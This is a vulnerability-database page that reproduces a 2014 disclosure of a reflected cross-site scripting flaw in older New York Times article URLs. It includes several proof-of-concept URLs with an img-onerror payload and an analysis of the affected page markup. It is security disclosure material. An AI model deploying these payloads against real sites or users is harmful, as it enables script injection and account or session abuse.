Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

New York Times Cross Site Scripting

🗓️ 16 Oct 2014 00:00:00Reported by Jing WangType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 47 Views

New York Times XSS Vulnerability before 201

Code
`New York Times nytimes.com Page Design XSS Vulnerability (Almost all  
Article Pages Before 2013 are Affected)  
  
  
Domain:  
http://www.nytimes.com/  
  
  
  
Vulnerability Description:  
The vulnerability occurs at New York Times’s URLs. Nytimes (short for New  
York Times) uses part of the URLs to construct its pages. However, it seems  
that Nytimes does not filter the content used for the construction at all  
before 2013.  
  
Based on Nytimes’s Design, Almost all URLs before 2013 are affected (All  
pages of articles). In fact, all article pages that contain “PRINT” button,  
“SINGLE PAGE” button, “Page *” button, “NEXT PAGE” button are affected.  
  
Nytimes changed this mechanism since 2013. It decodes the URLs sent to its  
server. This makes the mechanism much safer now.  
  
However, all URLs before 2013 are still using the old mechanism. This means  
almost all article pages before 2013 are still vulnerable to XSS attacks. I  
guess the reason Nytimes does not filter URLs before is cost. It costs too  
much (money & human capital) to change the database of all posted articles  
before.  
  
  
  
  
Living POCs:  
http://www.nytimes.com/2012/02/12/sunday-review/big-datas-impact-in-the-world.html/“><img  
src=x onerror=prompt(‘justqdjing’)>  
http://www.nytimes.com/2011/01/09/travel/09where-to-go.html/“><img src=x  
onerror=prompt(‘justqdjing’)>?pagewanted=all&_r=0  
http://www.nytimes.com/2010/12/07/opinion/07brooks.html/“><img src=x  
onerror=prompt(‘justqdjing’)>  
http://www.nytimes.com/2009/08/06/technology/06stats.html/“><img src=x  
onerror=prompt(‘justqdjing’)>  
http://www.nytimes.com/2008/07/09/dining/091crex.html/“><img src=x  
onerror=prompt(‘justqdjing’)>  
http://www.nytimes.com/2007/11/14/opinion/lweb14brain.html/“><img src=x  
onerror=prompt(‘justqdjing’)>  
  
  
  
  
POC Video:  
https://www.youtube.com/user/tetraph  
  
  
  
  
Vulnerability Analysis:  
Take the following link as an example,  
http://www.nytimes.com/2012/02/12/sunday-review/big-datas-impact-in-the-world.html/  
“><vulnerabletoattack  
  
We can see that for the page reflected, it contains the following codes.  
All of them are vulnerable.  
  
<li class=”print”>  
<a  
href=”/2012/02/12/sunday-review/big-datas-impact-in-the-world.html/”><vulnerabletoattack?pagewanted=print”>Print</testtesttest?pagewanted=print”></a>  
</li>  
  
<li class=”singlePage”>  
<a  
href=”/2012/02/12/sunday-review/big-datas-impact-in-the-world.html/”><testtesttest?pagewanted=all”>  
Single Page</vulnerabletoattack?pagewanted=all”></a>  
</li>  
  
<li> <a onclick=”s_code_linktrack(‘Article-MultiPagePageNum2′);”  
title=”Page 2″  
href=”/2012/02/12/sunday-review/big-datas-impact-in-the-world.html/”><vulnerabletoattack?pagewanted=2″>2</testtesttest?pagewanted=2″></a>  
</li>  
  
<li> <a onclick=”s_code_linktrack(‘Article-MultiPagePageNum3′);”  
title=”Page 3″  
href=”/2012/02/12/sunday-review/big-datas-impact-in-the-world.html/”><vulnerabletoattack?pagewanted=3″>3</testtesttest?pagewanted=3″></a>  
</li>  
  
<a class=”next” onclick=”s_code_linktrack(‘Article-MultiPage-Next’);”  
title=”Next Page”  
href=”/2012/02/12/sunday-review/big-datas-impact-in-the-world.html/”><vulnerabletoattack?pagewanted=2″>Next  
Page »</testtesttest?pagewanted=2″></a>  
  
  
  
  
  
The vulnerability can be attacked without user login. Tests were performed  
on Firefox (26.0) in Ubuntu (12.04) and IE (9.0.15) in Windows 7.  
  
  
  
  
  
Cross-site scripting (XSS) is a type of computer security vulnerability  
typically found in Web applications. XSS enables attackers to inject  
client-side script into Web pages viewed by other users. A cross-site  
scripting vulnerability may be used by attackers to bypass access controls  
such as the same origin policy.  
  
  
  
  
  
Reported By:  
Wang Jing, mathematics student from Nanyang Technological University,  
Singapore.  
http://tetraph.com/wangjing/  
  
  
  
  
More Details:  
http://www.tetraph.com/blog/xss-vulnerability/new-york-times-nytimes-com-page-design-xss-vulnerability-almost-all-article-pages-are-affected/  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
16 Oct 2014 00:00Current
7.4High risk
Vulners AI Score7.4
new york timesvulnerabilityxssnytimesurlcross-site scripting
47